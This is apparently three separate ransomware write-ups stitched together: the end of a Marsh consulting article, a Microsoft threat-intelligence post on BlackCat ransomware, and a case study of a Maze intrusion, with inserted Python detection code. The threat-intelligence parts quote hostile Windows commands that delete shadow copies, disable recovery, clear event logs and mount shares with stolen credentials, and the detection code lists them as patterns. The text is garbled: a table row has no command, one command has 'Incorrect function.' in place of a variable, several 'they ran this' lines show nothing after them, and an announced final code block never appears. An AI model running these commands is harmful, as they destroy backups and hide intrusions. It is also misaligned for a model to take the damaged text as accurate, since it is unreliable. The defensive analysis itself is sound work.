As part of its cyber incident response plan, ABC’s final action is to conduct an after-action review. The purpose of this exercise is to understand and document what went well and what didn’t — and how to address any gaps or weaknesses. That’s a critical step to take in order to ensure ABC learns from the incident and is better prepared for the possibility of a future attack, which may be similar to the last one — or completely different.

With the help of a forensics provider, ABC learns that the ransomware entered its networks through a phishing campaign and was able to spread across its network with ease, scooping up administrative credentials along the way and even credentials for the company’s industrial control systems. Armed with these findings, ABC develops an action plan to harden its cybersecurity with additional phishing tests, new multifactor authentication initiatives, and improved network segmentation based on system and data criticality. ABC also re-evaluates its cyber insurance limits as risk transfer has proven to be both critical and complementary to ABC’s risk mitigation efforts.

As part of this exercise, both Marsh and ABC review ABC's cyber incident response plan. Like a number of its peers, ABC's plan, while robust in many ways, did not specifically address a ransomware attack. But a plan specific to ransomware is critical to making timely decisions.

Working with Marsh and external partners, ABC is able to update its internal guidance around ransomware attacks, perform an IoC assessment, identify and document vulnerabilities or gaps, and review its backup strategy – and critically, align all key stakeholders around ABC’s strategies to manage the organization’s cyber risk. The bottom line: ABC is more confident, more aligned, better prepared, and better protected in the event of another ransomware attack in the future.

How Else Can Marsh Help You Manage Ransomware Threats?

Beyond providing support following an attack, Marsh can also help your organization address potential ransomware threats on an ongoing basis. We can offer:

  • Ransomware Insights: An intelligence briefing detailing the ransomware environment, your potential vulnerabilities, top attack vectors, best practices for you to follow, and potential cost estimates.
  • Insurance Program Design: Advice and guidance on key policy terms and conditions and program structures, insight into underwriters' priorities and objectives, and aggressive marketing on your behalf.
  • Ransomware Readiness Assessment: A review of your current operations, with feedback and analysis based on best practices sourced from assessments of more than 1,400 businesses.
  • Cyber Financial Stress Test: An estimate of the potential total cost of a ransomware or other cyber incident to your organization, which can inform critical decisions about cyber insurance and risk management strategies and investments.
  • Cyber Incident Response Plan: Assistance in building a plan or revising an existing one to help you respond to a cyber event, with specific considerations for ransomware.
  • Cybersecurity Program Review: A review of an organization's cybersecurity policies, plans, procedures, and training that culminates in a maturity assessment and actionable recommendations for improvement.

Reid Sawyer

Head, US Cyber Risk Consulting, Marsh

James Holtzclaw

Senior Vice President, Cybersecurity Consulting and Advisory Services, Marsh Risk Consulting (MRC)

Susan Young

Managing Director, Cyber Practice, Marsh US

The many lives of BlackCat ransomware

  • By Microsoft Threat Intelligence

April 2023 update – Microsoft Threat Intelligence has shifted to a new threat actor naming taxonomy aligned around the theme of weather. DEV-0237 is now tracked as Pistachio Tempest and DEV-0504 is now tracked as Velvet Tempest. To learn about how the new taxonomy represents the origin, unique traits, and impact of threat actors, and to get a complete mapping of threat actor names, read this blog: Microsoft shifts to a new threat actor naming taxonomy.

The BlackCat ransomware, also known as ALPHV, is a prevalent threat and a prime example of the growing ransomware as a service (RaaS) gig economy. It’s noteworthy due to its unconventional programming language (Rust), multiple target devices and possible entry points, and affiliation with prolific threat activity groups. While BlackCat’s arrival and execution vary based on the actors deploying it, the outcome is the same—target data is encrypted, exfiltrated, and used for “double extortion,” where attackers threaten to release the stolen data to the public if the ransom isn’t paid.

First observed in November 2021, BlackCat initially made headlines because it was one of the first ransomware families written in the Rust programming language. By using a modern language for its payload, this ransomware attempts to evade detection, especially by conventional security solutions that might still be catching up in their ability to analyze and parse binaries written in such a language. BlackCat can also target multiple devices and operating systems. Microsoft has observed successful attacks against Windows and Linux devices and VMware instances.

As we previously explained, the RaaS affiliate model consists of multiple players: access brokers, who compromise networks and maintain persistence; RaaS operators, who develop tools; and RaaS affiliates, who perform other activities like moving laterally across the network and exfiltrating data before ultimately launching the ransomware payload. Thus, as a RaaS payload, how BlackCat enters a target organization’s network varies, depending on the RaaS affiliate that deploys it. For example, while the common entry vectors for these threat actors include remote desktop applications and compromised credentials, we also saw a threat actor leverage Exchange server vulnerabilities to gain target network access. In addition, at least two known affiliates are now adopting BlackCat: DEV-0237 (known for previously deploying Ryuk, Conti, and Hive) and DEV-0504 (previously deployed Ryuk, REvil, BlackMatter, and Conti).

Such variations and adoptions markedly increase an organization’s risk of encountering BlackCat and pose challenges in detecting and defending against it because these actors and groups have different tactics, techniques, and procedures (TTPs). Thus, no two BlackCat “lives” or deployments might look the same. Indeed, based on Microsoft threat data, the impact of this ransomware has been noted in various countries and regions in Africa, the Americas, Asia, and Europe.

Human-operated ransomware attacks like those that deploy BlackCat continue to evolve and remain one of the attackers’ preferred methods to monetize their attacks. Organizations should consider complementing their security best practices and policies with a comprehensive solution like Microsoft 365 Defender , which offers protection capabilities that correlate various threat signals to detect and block such attacks and their follow-on activities.

In this blog, we provide details about the ransomware’s techniques and capabilities. We also take a deep dive into two incidents we’ve observed where BlackCat was deployed, as well as additional information about the threat activity groups that now deliver it. Finally, we offer best practices and recommendations to help defenders protect their organizations against this threat, including hunting queries and product-specific mitigations.

BlackCat’s anatomy: Payload capabilities

As mentioned earlier, BlackCat is one of the first ransomware written in the Rust programming language. Its use of a modern language exemplifies a recent trend where threat actors switch to languages like Rust or Go for their payloads in their attempt to not only avoid detection by conventional security solutions but also to challenge defenders who may be trying to reverse engineer the said payloads or compare them to similar threats.

BlackCat can target and encrypt Windows and Linux devices and VMware instances. It has extensive capabilities, including self-propagation that an affiliate can configure for their purposes and for the environment encountered.

In the instances we’ve observed where the BlackCat payload did not have administrator privileges, the payload was launched via dllhost.exe, which then launched the commands in Table 1 via cmd.exe. These commands could vary, as the BlackCat payload allows affiliates to customize execution to the environment.

The flags used by the attackers and the options available were the following: `-s -d -f -c`; `--access-token`; `--propagated`; `-no-prop-servers`

Screenshot of BlackCat ransomware deployment options and subcommands with corresponding descriptions.

| Command | Purpose |
| --- | --- |
| `[service name] /stop` | Stops running services to allow encryption of data |
| `vssadmin.exe Delete Shadows /all /quiet` | Deletes backups to prevent recovery |
| `wmic.exe Shadowcopy Delete` | Deletes shadow copies |
| `wmic csproduct get UUID` | Gets the Universally Unique Identifier (UUID) of the target device |
| `reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f` | Modifies the registry to change MaxMpxCt settings; BlackCat does this to increase the number of outstanding requests allowed (for example, SMB requests when distributing ransomware via its PsExec methodology) |
| `for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"` | Clears event logs |
| | Allows remote-to-local symbolic links; a symbolic link is a file-system object (for example, a file or folder) that points to another file system object, like a shortcut in many ways but more powerful |
| `fsutil behavior set SymlinkEvaluation R2R:1` | Allows remote-to-remote symbolic links |
| `net use \\[computer name] /user:[domain]\[user] [password] /persistent:no` | Mounts network share |

User account control (UAC) bypass

BlackCat can bypass UAC, which means the payload will successfully run even if it runs from a non-administrator context. If the ransomware isn’t run with administrative privileges, it runs a secondary process under dllhost.exe with sufficient permissions needed to encrypt the maximum number of files on the system.

Domain and device enumeration

The ransomware can determine the computer name of the given system, local drives on a device, and the AD domain name and username on a device. The malware can also identify whether a user has domain admin privileges, thus increasing its capability of ransoming more devices.

Self-propagation

BlackCat discovers all servers that are connected to a network. The process first broadcasts NetBIOS Name Service (NBNS) messages to check for these additional devices. The ransomware then attempts to replicate itself on the answering servers via PsExec, using the credentials specified within the config.

Hampering recovery efforts

BlackCat has numerous methods to make recovery efforts more difficult. The following are commands that might be launched by the payload, as well as their purposes:

  • `"C:\Windows\system32\cmd.exe" /c "bcdedit /set {default}"`
  • `"C:\Windows\system32\cmd.exe" /c "bcdedit /set {default} recoveryenabled No"`
  • `"C:\Windows\system32\cmd.exe" /c "vssadmin.exe Delete Shadows /all /quiet"`
  • `"C:\Windows\system32\cmd.exe" /c "wmic.exe Shadowcopy Delete"`
  • `"C:\Windows\system32\cmd.exe" /c "cmd.exe /c  for /F \"tokens=*\" Incorrect function. in ('wevtutil.exe el') DO wevtutil.exe cl \"Incorrect function. \""`

Slinking its way in: Identifying attacks that can lead to BlackCat ransomware

Consistent with the RaaS model, threat actors utilize BlackCat as an additional payload to their ongoing campaigns. While their TTPs remain largely the same (for example, using tools like Mimikatz and PsExec to deploy the ransomware payload), BlackCat-related compromises have varying entry vectors, depending on the ransomware affiliate conducting the attack. Therefore, the pre-ransom steps of these attacks can also be markedly different.

For example, our research noted that one affiliate that deployed BlackCat leveraged unpatched Exchange servers or used stolen credentials to access target networks. The following sections detail the end-to-end attack chains of these two incidents we’ve observed.

Case study 1: Entry via unpatched Exchange

In one incident we’ve observed, attackers took advantage of an unpatched Exchange server to enter the target organization.

Diagram with icons and timeline depicting different attack stages, starting with the exploitation of an Exchange server vulnerability and ending with the deployment of BlackCat ransomware and double extortion.

Upon exploiting the Exchange vulnerability, the attackers launched the following discovery commands to gather information about the device they had compromised:

  • cmd.exe and the commands ver and systeminfo – to collect operating system information
  • net.exe – to determine domain computers, domain controllers, and domain admins in the environment

After executing these commands, the attackers navigated through directories and discovered a passwords folder that granted them access to account credentials they could use in the subsequent stages of the attack. They also used the del command to delete files related to their initial compromise activity.

The attackers then mounted a network share using net use and the stolen credentials and began looking for potential lateral movement targets using a combination of methods. First, they ran WMIC.exe with the previously gathered device name as the node, launched the command whoami /all, and pinged google.com to check network connectivity. The output was then written to a .log file on the mounted share. Second, the attackers used PowerShell.exe with the Get-ADComputer cmdlet and a filter to gather the last sign-in event.

Lateral movement

Two and a half days later, the attackers signed into one of the target devices they found during their initial discovery efforts using compromised credentials via interactive sign-in. They opted for a credential theft technique that didn’t require dropping a file like Mimikatz that antivirus products might detect. Instead, they opened Taskmgr.exe, created a dump file of the LSASS.exe process, and saved the file to a ZIP archive.

The attackers continued their previous discovery efforts using a PowerShell script version of ADRecon (ADRecon.ps1), which is a tool designed to gather extensive information about an Active Directory (AD) environment. The attacker followed up this action with a net scanning tool that opened connections to devices in the organization on Server Message Block (SMB) and Remote Desktop Protocol (RDP). For discovered devices, the attackers attempted to navigate to various network shares and used the Remote Desktop client (mstsc.exe) to sign into these devices, once again using the compromised account credentials.

These behaviors continued for days, with the attackers signing into numerous devices throughout the organization, dumping credentials, and determining what devices they could access.

Collection and exfiltration

On many of the devices the attackers signed into, efforts were made to collect and exfiltrate extensive amounts of data from the organization, including domain settings and information and intellectual property. To do this, the attackers used both MEGAsync and Rclone, which were renamed as legitimate Windows process names (for example, winlogon.exe, mstsc.exe).

Exfiltration of domain information to identify targets for lateral movement

Collecting domain information allowed the attackers to progress further in their attack because the said information could identify potential targets for lateral movement or those that would help the attackers distribute their ransomware payload. To do this, the attackers once again used ADRecon.ps1 with numerous PowerShell cmdlets such as the following:

  • Get-ADRGPO – gets group policy objects (GPO) in a domain
  • Get-ADRDNSZone – gets all DNS zones and records in a domain
  • Get-ADRGPLink – gets all group policy links applied to a scope of management in a domain

Additionally, the attackers dropped and used ADFind.exe commands to gather information on persons, computers, organizational units, and trust information, as well as pinged dozens of devices to check connectivity.

Exfiltration for double extortion

Intellectual property theft likely allowed the attackers to threaten the release of information if the subsequent ransom wasn’t paid—a practice known as “double extortion.” To steal intellectual property, the attackers targeted and collected data from SQL databases. They also navigated through the directories and project folders of each device they could access and exfiltrated the data they found there.

The exfiltration occurred for multiple days on multiple devices, which allowed the attackers to gather large volumes of information that they could then use for double extortion.

Encryption and ransom

It was a full two weeks from the initial compromise before the attackers progressed to ransomware deployment, which highlights the need to triage and scope alert activity early in order to understand which accounts were compromised and how much access the attacker gained. Distribution of the ransomware payload using PsExec.exe proved to be the most common attack method.

Screenshot of the ransom note displayed by BlackCat ransomware. It informs affected users that sensitive data from their network has been downloaded and that they must act quickly and pay the ransom if they don't want the data to be published.

Case study 2: Entry via compromised credentials

In another incident we observed, we found that a ransomware affiliate gained initial access to the environment via an internet-facing Remote Desktop server using compromised credentials to sign in.

Diagram with icons and timeline depicting different attack stages, starting with the attacker using stolen credentials to sign into Remote Desktop and ending with the deployment of BlackCat ransomware.

Once the attackers gained access to the target environment, they then used SMB to copy over and launch the Total Deployment Software administrative tool, allowing remote automated software deployment. Once this tool was installed, the attackers used it to install ScreenConnect (now known as ConnectWise), a remote desktop software application.

ScreenConnect was used to establish a remote session on the device, allowing attackers interactive control. With the device in their control, the attackers used cmd.exe to update the Registry to allow cleartext authentication via WDigest, which saved them time because they no longer needed to crack password hashes. Shortly after, they used the Task Manager to dump the LSASS.exe process to steal the password, now in cleartext.

Eight hours later, the attackers reconnected to the device and stole credentials again. This time, however, they dropped and launched Mimikatz for the credential theft routine, likely because it can grab credentials beyond those stored in LSASS.exe. The attackers then signed out.

Persistence and encryption

A day later, the attackers returned to the environment using ScreenConnect. They used PowerShell to launch a command prompt process and then added a user account to the device using net.exe. The new user was then added to the local administrator group via net.exe.

Afterward, the attackers signed in using their newly created user account and began dropping and launching the ransomware payload. This account would also serve as a means of additional persistence beyond ScreenConnect and their other footholds in the environment to allow them to re-establish their presence, if needed. Ransomware adversaries are not above ransoming the same organization twice if access is not fully remediated.

Chrome.exe was used to navigate to a domain hosting the BlackCat payload. Notably, the folder structure included the organization name, indicating that this was a pre-staged payload specifically for the organization. Finally, the attackers launched the BlackCat payload on the device to encrypt its data.

Ransomware affiliates deploying BlackCat

Apart from the incidents discussed earlier, we’ve also observed that two of the most prolific affiliate groups associated with ransomware deployments have switched to deploying BlackCat. Payload switching is typical for some RaaS affiliates, whether to ensure business continuity or because there’s a possibility of better profit. Unfortunately for organizations, such adoption further adds to the challenge of detecting related threats.

Microsoft tracks one of these affiliate groups as DEV-0237. Also known as FIN12, DEV-0237 is notable for its distribution of Hive, Conti, and Ryuk ransomware. We’ve observed that this group added BlackCat to their list of distributed payloads beginning March 2022. Their switch to BlackCat from their last used payload (Hive) is suspected to be due to the public discourse around the latter’s decryption methodologies.

DEV-0504 is another active affiliate group that we’ve seen switching to BlackCat for their ransomware attacks. Like many RaaS affiliate groups, the following TTPs might be observed in a DEV-0504 attack:

  • Entry vector that can involve the affiliate remotely signing into devices with compromised credentials, such as into devices running software solutions that allow for remote work
  • The attackers’ use of their access to conduct discovery on the domain
  • Lateral movement that potentially uses the initial compromised account
  • Credential theft with tools like Mimikatz and Rubeus

DEV-0504 typically exfiltrates data from the devices they compromise in the organization using a malicious tool such as StealBit, often named “send.exe” or “sender.exe”. PsExec is then used to distribute the ransomware payload. The group has been observed delivering the following ransomware families before their adoption of BlackCat beginning December 2021:

  • BlackMatter
  • LockBit 2.0

Defending against BlackCat ransomware

Today’s ransomware attacks have become more impactful because of their growing industrialization through the RaaS affiliate model and the increasing trend of double extortion. The incidents we’ve observed related to the BlackCat ransomware leverage these two factors, making this threat durable against conventional security and defense approaches that only focus on detecting the ransomware payloads. Detecting threats like BlackCat, while good, is no longer enough as human-operated ransomware continues to grow, evolve, and adapt to the networks it’s deployed in and the attackers it works for.

Instead, organizations must shift their defensive strategies to prevent the end-to-end attack chain. As noted above, while attackers’ entry points may vary, their TTPs remain largely the same. In addition, these types of attacks continue to take advantage of an organization’s poor credential hygiene and legacy configurations or misconfigurations to succeed. Therefore, defenders should address these common paths and weaknesses by hardening their networks through various best practices such as access monitoring and proper patch management. We provide detailed steps on building these defensive strategies against ransomware in this blog.

In the BlackCat-related incidents we’ve observed, the common entry points for ransomware affiliates were compromised credentials used to access internet-facing remote access software, and unpatched Exchange servers. Therefore, defenders should review their organization’s identity posture, carefully monitor external access, and locate vulnerable Exchange servers in their environment to update as soon as possible. The financial impact, reputation damage, and other repercussions that stem from attacks involving ransomware like BlackCat far outweigh the downtime, service interruption, and other pain points of applying security updates and implementing best practices.

Leveraging Microsoft 365 Defender’s comprehensive threat defense capabilities

Microsoft 365 Defender helps protect organizations from attacks that deliver the BlackCat ransomware and other similar threats by providing cross-domain visibility and coordinated threat defense. It uses multiple layers of dynamic protection technologies and correlates threat data from email, endpoints, identities, and cloud apps. Microsoft Defender for Endpoint detects tools like Mimikatz, the actual BlackCat payload, and subsequent attacker behavior. Threat and vulnerability management capabilities also help discover vulnerable or misconfigured devices across different platforms; such capabilities could help detect and block possible exploitation attempts on vulnerable devices, such as those running Exchange. Finally, advanced hunting lets defenders create custom detections to proactively surface this ransomware and other related threats.

Additional mitigations and recommendations

Defenders can also follow the following steps to reduce the impact of this ransomware:

  • Turn on Microsoft Defender Antivirus. Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a large amount of new and unknown variants.
  • Enforce strong, randomized local administrator passwords. Use tools like Local Administrator Password Solution (LAPS).
  • Require multifactor authentication (MFA) for local device access, RDP access, and remote connections through virtual private networks (VPNs) and Outlook Web Access. Solutions like Windows Hello or Fast ID Online (FIDO) v2.0 security keys let users sign in using biometrics and/or a physical key or device.
  • Turn on Microsoft Defender Firewall.
  • Implement controlled folder access to help prevent files from being altered or encrypted by ransomware. Set controlled folder access to Enabled or Audit mode.
  • Investigate and remediate vulnerabilities in Exchange servers. Also, determine if implementing the Exchange Emergency Mitigation service is feasible for your environment. This service helps keep your Exchange servers secure by applying mitigations to address potential threats against your servers.

Microsoft 365 Defender customers can also apply the additional mitigations below:

  • Use advanced protection against ransomware.
  • Turn on tamper protection in Microsoft Defender for Endpoint to prevent malicious changes to security settings. Enable network protection in Microsoft Defender for Endpoint and Microsoft 365 Defender to prevent applications or users from accessing malicious domains and other malicious content on the internet.
  • Ensure Exchange servers have applied the mitigations referenced in the related Threat Analytics report.
  • Block credential stealing from the Windows local security authority subsystem (lsass.exe)
  • Block process creations originating from PSExec and WMI commands
  • Block executable files from running unless they meet a prevalence, age, or trusted list criterion

For a full list of ransomware mitigations regardless of threat, refer to this article: Rapidly protect against ransomware and extortion .

Microsoft 365 Defender Threat Intelligence Team

Microsoft 365 Defender detections

Microsoft Defender Antivirus

  • Ransom:Win32/BlackCat!MSR
  • Ransom:Win32/BlackCat.MK!MTB
  • Ransom:Linux/BlackCat.A!MTB

Microsoft Defender for Endpoint EDR

Alerts with the following titles in the security center can indicate threat activity on your network:

  • An active ‘BlackCat’ ransomware was detected
  • ‘BlackCat’ ransomware was detected
  • BlackCat ransomware

Hunting queries

Microsoft 365 Defender

To locate possible ransomware activity, run the following queries.

Suspicious process execution in PerfLogs path

Use this query to look for processes executing in PerfLogs—a common path used to place the ransomware payloads.

Suspicious registry modification of MaxMpxCt parameters

Use this query to look for suspicious running processes that modify registry settings to increase the number of outstanding requests allowed (for example, SMB requests when distributing ransomware via its PsExec methodology).

Suspicious command line indicative of BlackCat ransom payload execution

Use these queries to look for instances of the BlackCat payload executing, based on a command argument it requires in order to encrypt successfully: ‘--access-token’.

Suspected data exfiltration

Use this query to look for command lines that indicate data exfiltration and the indication that an attacker may attempt double extortion.
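The Table 1 commands and the four hunting descriptions above can be turned into host-side detection logic. The following Python is an added example, not code from the original post and not Microsoft's published hunting queries: it runs the heuristics over constructed, Sysmon-style process-creation events, and the field names, rule names, hostnames and sample values are all assumptions.

```python
# Detection heuristics for the BlackCat behaviours described in this post.
# Added example; input records are constructed, Sysmon-style process-creation
# events with assumed field names (image, cmdline, original_file_name).
import ntpath
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    image: str                    # full path of the executed binary
    cmdline: str                  # command line as logged
    original_file_name: str = ""  # PE OriginalFileName, as Sysmon records it


@dataclass
class Finding:
    host: str
    rule: str
    evidence: str


# (rule name, regex applied to the lower-cased command line). The patterns
# correspond to the Table 1 commands and the hunting descriptions above.
CMDLINE_RULES = [
    ("shadow_copy_deletion",
     r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete"),
    ("recovery_disabled", r"bcdedit\s+/set\s+\{default\}\s+recoveryenabled\s+no"),
    ("event_log_clearing", r"wevtutil(\.exe)?\s+cl\b"),
    ("maxmpxct_modified", r"reg\s+add\s+.*lanmanserver\\parameters.*maxmpxct"),
    ("symlink_evaluation_changed", r"fsutil\s+behavior\s+set\s+symlinkevaluation"),
    ("blackcat_access_token_arg", r"(?:^|\s)--access-token(?:\s|=)"),
]

# Exfiltration tools seen in the case studies, matched on the PE
# OriginalFileName so that renaming the binary (e.g. to winlogon.exe) does
# not hide it.
EXFIL_ORIGINAL_NAMES = {"rclone.exe", "megasync.exe"}


def check_event(ev: ProcEvent) -> list[Finding]:
    """Return every rule the event triggers (possibly several)."""
    found: list[Finding] = []
    image = ev.image.lower()
    cmd = ev.cmdline.lower()

    # Payloads staged under C:\PerfLogs (first hunting query above).
    if re.search(r"\\perflogs\\", image):
        found.append(Finding(ev.host, "perflogs_execution", ev.image))

    for name, pattern in CMDLINE_RULES:
        if re.search(pattern, cmd):
            found.append(Finding(ev.host, name, ev.cmdline))

    orig = ev.original_file_name.lower()
    if orig in EXFIL_ORIGINAL_NAMES:
        renamed = ntpath.basename(image) != orig
        rule = "renamed_exfil_tool" if renamed else "exfil_tool"
        found.append(Finding(ev.host, rule,
                             f"{ev.image} (OriginalFileName={ev.original_file_name})"))
    return found


def analyze(events: list[ProcEvent]) -> list[Finding]:
    return [f for ev in events for f in check_event(ev)]


def summarize(findings: list[Finding]) -> dict[str, list[str]]:
    """Map host -> sorted list of distinct rule names that fired on it."""
    per_host: dict[str, set[str]] = {}
    for f in findings:
        per_host.setdefault(f.host, set()).add(f.rule)
    return {h: sorted(r) for h, r in per_host.items()}


# Constructed sample telemetry (hostnames, paths and the token value are made up).
SAMPLE_EVENTS = [
    ProcEvent("srv01", r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c "vssadmin.exe Delete Shadows /all /quiet"'),
    ProcEvent("srv01", r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c "bcdedit /set {default} recoveryenabled No"'),
    ProcEvent("srv01", r"C:\Windows\System32\reg.exe",
              r"reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services"
              r"\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f"),
    ProcEvent("srv02", r"C:\PerfLogs\locker.exe",
              "locker.exe --access-token 15742aa362a84ba3 -v"),
    ProcEvent("srv02", r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c for /F "tokens=*" %1 in (\'wevtutil.exe el\') '
              'DO wevtutil.exe cl "%1"'),
    ProcEvent("ws03", r"C:\Users\Public\winlogon.exe",
              r"winlogon.exe copy D:\Projects mega:backup",
              original_file_name="rclone.exe"),
    ProcEvent("ws07", r"C:\Windows\System32\svchost.exe",
              "svchost.exe -k netsvcs"),  # benign control event
]

if __name__ == "__main__":
    for host, rules in summarize(analyze(SAMPLE_EVENTS)).items():
        print(f"{host}: {', '.join(rules)}")
```

A single rule firing (for example, shadow copy deletion) is worth triage on its own; several firing on one host within a short window, as on srv01 and srv02 here, matches the pre-encryption sequence described in this post.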

Case Study: Catching a Human-Operated Maze Ransomware Attack In Action

Executive summary

  • Maze ransomware is one of the most widespread ransomware strains currently in the wild and is distributed by different capable actors.
  • We discovered a Maze affiliate deploying tailor-made persistence methods prior to delivering the ransomware.
  • The actor appears to have used a stolen certificate to sign its Beacon stager.
  • In common with other attacks, the actor used an HTA payload as an interactive shell, which we were able to catch live and deobfuscate.

Maze ransomware has been used extensively in the last year or so as the final payload by many different actors around the world. This year, Maze operators notoriously began extorting companies not just by encrypting files but also through threatening to publish exfiltrated files online. We recently caught one Maze affiliate at the early stage of attempting to spread through a network belonging to one of our clients.

In this post, we share details about the methods used by this Maze affiliate in order to shed light on their tactics and to help security teams hunt for similar IOCs in their own networks.

Attack Entry Point

As previously reported in other Maze incidents , the attackers used RDP to gain access to an internet-facing machine, probably by brute-forcing the Administrator’s password. One of the attacks against a US company began on Saturday the 4th of July, a date obviously chosen in the hope that many people – particularly security staff – might not be at work that day.

The attackers connected using RDP and uploaded their beacon payload, disguised as a known Microsoft binary named netplwiz.exe. Their payload had the same icon and description as the genuine binary of the same name and was also signed, most likely with a stolen certificate.

Sysinternals’ sigcheck.exe on the original netplwiz.exe:

In the malicious netplwiz.exe, we can see the stolen certificate:

A closer look at the certificate:

This executable is a simple packer that loads Cobalt Strike’s Beacon version 4. This packer is pretty simple, and does the following:

  • Hides their window
  • Checks for a debugger using IsDebuggerPresent
  • Decodes a XOR’ed stageless beacon (note: it uses VirtualAllocExNuma for memory allocation instead of the more commonly used VirtualAlloc/Ex)
  • Executes the beacon

The decoding function looks like this:

We dumped the beacon from memory and parsed its configuration:

Tailor-Made Persistence Mechanisms

Although the entry method is pretty common, the attackers displayed great creativity in their persistence methods, which were tailor-made to the machine they found themselves on.

For example, one host was running a SolarWinds Orion instance. Orion uses RabbitMQ as its internal messaging component, which is installed with the product. RabbitMQ is written in Erlang and therefore runs under the Erlang runtime service (erlsrv.exe).

The attackers relied on this dependency chain to get their code executed inside the erlsrv.exe process and so gain persistence on the host, since the RabbitMQ service keeps erlsrv.exe running.

We could see this when the attackers dropped two DLLs containing their beacon stager to disk and then began interfering with the RabbitMQ service:

The hijacked DLL is version.dll, which is normally loaded from the system32 folder. By dropping a copy in the same folder as erlsrv.exe, the attackers made erlsrv.exe load their version.dll, which in turn loaded acluapi.dll containing the beacon.

After restarting the RabbitMQ service, a Cobalt Strike Beacon started communicating to the same domain as the one from netplwiz, but this time from erlsrv.exe and SYSTEM integrity level.

In another case showing similar adaptation to the local environment, the attackers targeted the Java Updater which runs when the computer starts and dropped a DLL that is loaded by jusched.exe when it starts.
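As an added example (not code from the original post), the check below looks for the DLL search-order shadowing used against erlsrv.exe and jusched.exe: a DLL sitting beside a service binary that shares its name with a System32 DLL but differs from it byte-for-byte. The directory layout, file contents and the partial KnownDLLs subset are constructed for the demonstration.

```python
import hashlib
import tempfile
from pathlib import Path

# Partial, illustrative subset of Windows KnownDLLs (the authoritative list is the registry key
# HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs). KnownDLLs are always mapped
# from System32, so a same-named file next to an executable is never loaded in their place.
# version.dll is deliberately NOT a KnownDLL, which is what makes it a search-order hijack target.
KNOWN_DLLS = {"ntdll.dll", "kernel32.dll", "kernelbase.dll", "user32.dll", "advapi32.dll", "gdi32.dll"}


def sha256_of(path: Path) -> str:
    """SHA-256 of a file, read in chunks so large DLLs need not fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_shadowing_dlls(app_dir, system_dir):
    """Report DLLs in app_dir that share a name with a System32 DLL and differ from it.

    Such a file sits earlier in the loader's search order than the System32 copy, which is how
    the version.dll dropped next to erlsrv.exe got loaded. A byte-identical copy (for example a
    legitimately redistributed runtime DLL) is not reported. Returns the suspicious file names.
    """
    system_copies = {p.name.lower(): p for p in Path(system_dir).iterdir() if p.suffix.lower() == ".dll"}
    suspicious = []
    for candidate in sorted(Path(app_dir).iterdir()):
        name = candidate.name.lower()
        if candidate.suffix.lower() != ".dll" or name in KNOWN_DLLS:
            continue
        genuine = system_copies.get(name)
        if genuine is None:
            continue  # no System32 namesake: an ordinary application DLL, not a shadow
        if sha256_of(candidate) != sha256_of(genuine):
            suspicious.append(candidate.name)
    return suspicious


def demo():
    """Build a constructed directory layout mimicking the RabbitMQ host from the case and scan it."""
    root = Path(tempfile.mkdtemp(prefix="dllshadow_"))
    system32 = root / "System32"
    rabbit = root / "RabbitMQ"
    system32.mkdir()
    rabbit.mkdir()
    # Constructed stand-ins for real binaries; only names and byte-equality matter to the check.
    (system32 / "version.dll").write_bytes(b"constructed: genuine version.dll")
    (system32 / "kernel32.dll").write_bytes(b"constructed: genuine kernel32.dll")
    (system32 / "vcruntime140.dll").write_bytes(b"constructed: runtime dll")
    (rabbit / "erlsrv.exe").write_bytes(b"constructed: erlang service wrapper")
    (rabbit / "vcruntime140.dll").write_bytes(b"constructed: runtime dll")   # identical copy: benign
    (rabbit / "version.dll").write_bytes(b"constructed: planted stager")     # differs: flagged
    (rabbit / "acluapi.dll").write_bytes(b"constructed: planted beacon")     # no namesake: not flagged here
    (rabbit / "kernel32.dll").write_bytes(b"constructed: would never load")  # KnownDLL: skipped
    return find_shadowing_dlls(rabbit, system32)


if __name__ == "__main__":
    for name in demo():
        print(f"possible DLL search-order hijack: {name}")
```

The second-stage acluapi.dll is not caught by this check because it has no System32 namesake, so pair it with file-creation monitoring on service directories.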

After installing persistence, the attackers did some domain reconnaissance and uploaded ngrok to C:\Windows\dwm.exe, which they used for tunneling.

They also ran this:

UI0Detect, as the name implies, detects and alerts the user when a program in session 0 tries to interact with the desktop. It is important for the attackers to disable this service to avoid alerting the user if they accidentally pop a message box or start a GUI application while running as SYSTEM.

HTA Payload

When they found an interesting server they wanted to move to laterally, they used sc.exe to deploy a tool that gave them an online shell on that target.

Specifically, they ran this command (IP changed):

They used mshta to run an HTA payload that was hosted on their site. We believe the HTA is their way of working online on remote computers before deploying their Cobalt Strike Beacon, if they believe it’s worth it.

The HTA payload is a somewhat sophisticated and automatically obfuscated code that we believe is self-made (as we’ve found no evidence of it online).

You can see the obfuscated and our de-obfuscated versions here.

When run, it first sends some basic information about the computer, such as OS version, routing info, Domain Controller name (if the computer is a member of a domain) and more:

The payload contains a variable that is empty when it is first run. In this case, it runs another HTA from the server using mshta.exe, which is identical to itself except that the variable now contains the value “prfx” instead of being empty.

Consequently, it enters a loop of running HTAs from the server.

The simplified code looks as follows:

The payload is interesting because it has some unique behavior:

  • It can be run both as a JScript file and as an HTA file
  • It never receives simple cmd.exe commands from the server, only HTAs (that may run cmd.exe themselves)
  • It’s obfuscated automatically and differently every time it is requested from the server

Also worth noting from a hunting perspective is that it runs net1.exe directly, instead of net.exe , probably to evade EDR and command-line based detection methods.
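An added hunting example, not from the original post: the rules below encode the behaviours described above (mshta.exe fetching a remote HTA, net1.exe invoked without net.exe as its parent, sc.exe stopping or disabling UI0Detect, and a dwm.exe running outside System32 as the renamed ngrok did) and run over constructed process-creation events. The event fields, hostnames and sample command lines are assumptions, not telemetry from the case.
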